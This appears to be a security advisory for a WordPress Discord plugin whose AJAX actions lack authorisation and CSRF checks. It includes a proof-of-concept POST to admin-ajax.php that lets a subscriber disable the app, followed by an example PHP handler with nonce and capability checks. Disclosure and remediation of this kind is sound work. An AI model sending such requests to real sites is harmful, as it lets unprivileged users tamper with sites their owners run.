The plugin does not have authorisation and Cross-Site Request Forgery (CSRF) checks in some of its AJAX actions, allowing any logged-in user, such as a subscriber, to call them and, for example, disable the app.
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=mo_discord_disable_app&app_name=test
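
The request above succeeds because the handler acts without checking who is calling or whether the request was intended. The following is an added example, not the plugin's own code, of a handler for the same action with both checks in place; the function name, nonce action string, `nonce` field, capability choice and option name are assumptions, and the code is meant to be loaded inside WordPress.

```php
<?php
// Added example, not the plugin's code. The handler name, nonce action,
// 'nonce' field and 'example_mo_discord_apps' option are hypothetical.

// Register only the authenticated hook; no wp_ajax_nopriv_ variant.
add_action( 'wp_ajax_mo_discord_disable_app', 'example_mo_discord_disable_app' );

function example_mo_discord_disable_app() {
    // CSRF check: require a nonce issued to this user for this action.
    // Passing false as the third argument returns false instead of dying,
    // so the handler controls the error response.
    if ( ! check_ajax_referer( 'example_mo_discord_disable_app', 'nonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid nonce.' ), 403 );
    }

    // Authorisation check: a subscriber is logged in but does not hold
    // manage_options, so the request stops here.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // Input handling: unslash, then reduce to a lowercase key.
    $app_name = isset( $_POST['app_name'] )
        ? sanitize_key( wp_unslash( $_POST['app_name'] ) )
        : '';
    if ( '' === $app_name ) {
        wp_send_json_error( array( 'message' => 'Missing app_name.' ), 400 );
    }

    // Hypothetical storage: an option holding per-app settings.
    $apps = get_option( 'example_mo_discord_apps', array() );
    if ( ! isset( $apps[ $app_name ] ) ) {
        wp_send_json_error( array( 'message' => 'Unknown app.' ), 404 );
    }

    $apps[ $app_name ]['enabled'] = false;
    update_option( 'example_mo_discord_apps', $apps );

    wp_send_json_success( array( 'app_name' => $app_name, 'enabled' => false ) );
}
```

The admin page that triggers this action would send the value of `wp_create_nonce( 'example_mo_discord_disable_app' )` in the `nonce` field; the nonce alone is not an authorisation control, which is why the capability check is kept separate.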